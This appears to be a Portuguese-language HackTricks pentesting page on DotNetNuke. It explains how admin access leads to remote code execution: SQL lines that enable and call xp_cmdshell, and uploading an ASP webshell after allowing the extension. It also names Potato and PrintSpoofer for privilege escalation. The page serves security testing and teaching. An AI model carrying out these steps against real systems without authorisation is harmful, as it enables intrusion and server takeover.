hacktricks/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md
2023-06-06 18:56:34 +00:00

2.7 KiB

DotNetNuke (DNN)

Se você entrar como administrador no DNN, é fácil obter RCE.

RCE

Via SQL

Um console SQL é acessível na página Settings onde você pode habilitar xp_cmdshell e executar comandos do sistema operacional.

Use estas linhas para habilitar xp_cmdshell:

EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1' 
RECONFIGURE

E pressione "Executar Script" para executar as sentenças SQL.

Em seguida, use algo como o seguinte para executar comandos do sistema operacional:

xp_cmdshell 'whoami'

Através do webshell ASP

Em Configurações -> Segurança -> Mais -> Mais configurações de segurança você pode adicionar novas extensões permitidas em Extensões de arquivo permitidas, e então clicar no botão Salvar.

Adicione asp ou aspx e então em /admin/file-management faça o upload de um webshell asp chamado shell.asp, por exemplo.

Então acesse /Portals/0/shell.asp para acessar o seu webshell.

Escalação de privilégios

Você pode escalar privilégios usando o Potatoes ou PrintSpoofer, por exemplo.

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥